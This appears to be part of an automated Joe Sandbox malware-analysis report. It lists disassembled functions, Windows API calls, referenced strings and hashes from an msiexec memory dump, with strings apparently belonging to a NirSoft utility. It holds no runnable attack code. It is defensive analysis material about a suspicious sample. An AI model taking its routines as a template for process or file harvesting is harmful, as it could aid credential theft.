                                                    • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                    • String ID: caption
                                                    • API String ID: 973020956-4135340389
                                                    • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                    • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                    • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                    • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                    APIs
                                                    Strings
                                                    • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$_snwprintf$wcscpy
                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                    • API String ID: 1283228442-2366825230
                                                    • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                    • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                    • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                    • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                    APIs
                                                    • wcschr.MSVCRT ref: 00413972
                                                    • wcscpy.MSVCRT ref: 00413982
                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                    • wcscpy.MSVCRT ref: 004139D1
                                                    • wcscat.MSVCRT ref: 004139DC
                                                    • memset.MSVCRT ref: 004139B8
                                                      • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                      • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                    • memset.MSVCRT ref: 00413A00
                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                    • wcscat.MSVCRT ref: 00413A27
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                    • String ID: \systemroot
                                                    • API String ID: 4173585201-1821301763
                                                    • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                    • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                    • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                    • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: wcscpy
                                                    • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                    • API String ID: 1284135714-318151290
                                                    • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                    • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                    • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                    • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                    APIs
                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                      • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                      • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                    • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                    • strchr.MSVCRT ref: 0040C140
                                                    • strchr.MSVCRT ref: 0040C151
                                                    • _strlwr.MSVCRT ref: 0040C15F
                                                    • memset.MSVCRT ref: 0040C17A
                                                    • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                    • String ID: 4$h
                                                    • API String ID: 4019544885-1856150674
                                                    • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                    • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                    • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                    • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                    • String ID: 0$6
                                                    • API String ID: 4066108131-3849865405
                                                    • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                    • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                    • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                    • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                    APIs
                                                    • memset.MSVCRT ref: 004082EF
                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                    • memset.MSVCRT ref: 00408362
                                                    • memset.MSVCRT ref: 00408377
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$ByteCharMultiWide
                                                    • String ID:
                                                    • API String ID: 290601579-0
                                                    • Opcode ID: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                    • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                    • Opcode Fuzzy Hash: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                    • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                    APIs
                                                    • memchr.MSVCRT ref: 00444EBF
                                                    • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                    • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                    • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                    • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                    • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                    • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                    • memset.MSVCRT ref: 0044505E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpy$memchrmemset
                                                    • String ID: PD$PD
                                                    • API String ID: 1581201632-2312785699
                                                    • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                    • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                    • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                    • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                    APIs
                                                    • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                    • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                    • GetDC.USER32(00000000), ref: 00409F6E
                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                    • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                    • GetParent.USER32(?), ref: 00409FA5
                                                    • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                    • String ID:
                                                    • API String ID: 2163313125-0
                                                    • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                    • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                    • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                    • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: free$wcslen
                                                    • String ID:
                                                    • API String ID: 3592753638-3916222277
                                                    • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                    • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                    • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                    • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                    APIs
                                                    • memset.MSVCRT ref: 0040A47B
                                                    • _snwprintf.MSVCRT ref: 0040A4AE
                                                    • wcslen.MSVCRT ref: 0040A4BA
                                                    • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                    • wcslen.MSVCRT ref: 0040A4E0
                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpywcslen$_snwprintfmemset
                                                    • String ID: %s (%s)$YV@
                                                    • API String ID: 3979103747-598926743
                                                    • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                    • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                    • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                    • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                    • wcslen.MSVCRT ref: 0040A6B1
                                                    • wcscpy.MSVCRT ref: 0040A6C1
                                                    • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                    • wcscpy.MSVCRT ref: 0040A6DB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                    • String ID: Unknown Error$netmsg.dll
                                                    • API String ID: 2767993716-572158859
                                                    • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                    • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                    • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                    • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                    APIs
                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                    • wcscpy.MSVCRT ref: 0040DAFB
                                                    • wcscpy.MSVCRT ref: 0040DB0B
                                                    • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                      • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfilewcscpy$AttributesFileString
                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                    • API String ID: 3176057301-2039793938
                                                    • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                    • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                    • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                    • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                    APIs
                                                    Strings
                                                    • database %s is already in use, xrefs: 0042F6C5
                                                    • cannot ATTACH database within transaction, xrefs: 0042F663
                                                    • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                    • too many attached databases - max %d, xrefs: 0042F64D
                                                    • database is already attached, xrefs: 0042F721
                                                    • unable to open database: %s, xrefs: 0042F84E
                                                    • out of memory, xrefs: 0042F865
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpymemset
                                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                    • API String ID: 1297977491-2001300268
                                                    • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                    • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                    • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                    • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                    APIs
                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                    • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                    • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                    • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                    • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                    • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                    • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                    • String ID: ($d
                                                    • API String ID: 1140211610-1915259565
                                                    • Opcode ID: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                    • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                    • Opcode Fuzzy Hash: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                    • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                    APIs
                                                    • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                    • Sleep.KERNEL32(00000001), ref: 004178E9
                                                    • GetLastError.KERNEL32 ref: 004178FB
                                                    • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: File$ErrorLastLockSleepUnlock
                                                    • String ID:
                                                    • API String ID: 3015003838-0
                                                    • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                    • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                    • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                    • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                    APIs
                                                    • memset.MSVCRT ref: 00407E44
                                                    • memset.MSVCRT ref: 00407E5B
                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                    • wcscpy.MSVCRT ref: 00407F10
                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                    • String ID:
                                                    • API String ID: 59245283-0
                                                    • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                    • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                    • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                    • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                    APIs
                                                    • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                    • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                    • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpy
                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                    • API String ID: 3510742995-3273207271
                                                    • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                    • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                    • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                    • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                    APIs
                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                    • memset.MSVCRT ref: 00413ADC
                                                    • memset.MSVCRT ref: 00413AEC
                                                      • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                    • memset.MSVCRT ref: 00413BD7
                                                    • wcscpy.MSVCRT ref: 00413BF8
                                                    • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                    • String ID: 3A
                                                    • API String ID: 3300951397-293699754
                                                    • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                    • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                    • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                    • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                    • wcscpy.MSVCRT ref: 0040D1B5
                                                      • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                      • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                    • wcslen.MSVCRT ref: 0040D1D3
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                    • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                    • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                    • String ID: strings
                                                    • API String ID: 3166385802-3030018805
                                                    • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                    • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                    • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                    • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                    APIs
                                                    • memset.MSVCRT ref: 0041249C
                                                    • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                    • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                    • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                    • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                    • wcscpy.MSVCRT ref: 004125A0
                                                    Strings
